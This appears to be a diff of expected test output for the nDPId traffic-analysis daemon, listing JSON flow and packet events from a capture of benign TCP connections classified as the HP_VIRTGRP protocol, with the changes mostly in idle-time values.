+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":522,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1614861892925} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"} 
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-data-len":1566,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1614876808445} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":61,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":2088,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":28,"global_ts_msec":1614877863379} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"} 